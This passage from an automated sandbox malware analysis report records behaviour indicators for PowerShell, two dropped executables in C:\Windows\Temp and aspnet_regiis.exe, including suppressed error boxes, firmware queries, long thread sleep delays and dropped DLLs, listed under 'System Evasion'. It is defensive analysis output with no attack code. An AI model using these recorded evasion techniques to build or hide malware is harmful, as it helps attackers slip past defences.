                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: zbjnkzvo4cc.exe PID: 8012, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeMemory allocated: 26F0000 memory reserve | memory write watch
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeMemory allocated: 2970000 memory reserve | memory write watch
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeMemory allocated: 2790000 memory reserve | memory write watch
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeMemory allocated: 4E70000 memory reserve | memory write watch
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeMemory allocated: 5E70000 memory reserve | memory write watch
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeMemory allocated: 5FA0000 memory reserve | memory write watch
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeMemory allocated: 6FA0000 memory reserve | memory write watch
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeMemory allocated: 7430000 memory reserve | memory write watch
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeMemory allocated: 8430000 memory reserve | memory write watch
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeMemory allocated: 2730000 memory reserve | memory write watch
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeMemory allocated: 2A20000 memory reserve | memory write watch
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeMemory allocated: 2730000 memory reserve | memory write watch
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeMemory allocated: 5010000 memory reserve | memory write watch
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeMemory allocated: 6010000 memory reserve | memory write watch
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeMemory allocated: 6140000 memory reserve | memory write watch
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeMemory allocated: 7140000 memory reserve | memory write watch
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeMemory allocated: 7490000 memory reserve | memory write watch
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeMemory allocated: 8490000 memory reserve | memory write watch
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6331Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3281Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7613
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2008
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4700Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5076Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4275Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5457Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4297
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3387
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3666
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3355
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3290
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2337
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4801
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1963
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5095
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1668
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5382
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2532
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2676Thread sleep count: 6331 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3492Thread sleep count: 3281 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2144Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7428Thread sleep count: 7613 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7432Thread sleep count: 2008 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7460Thread sleep time: -7378697629483816s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7592Thread sleep count: 4700 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7596Thread sleep count: 5076 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7624Thread sleep time: -27670116110564310s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7744Thread sleep count: 4275 > 30Jump to behavior
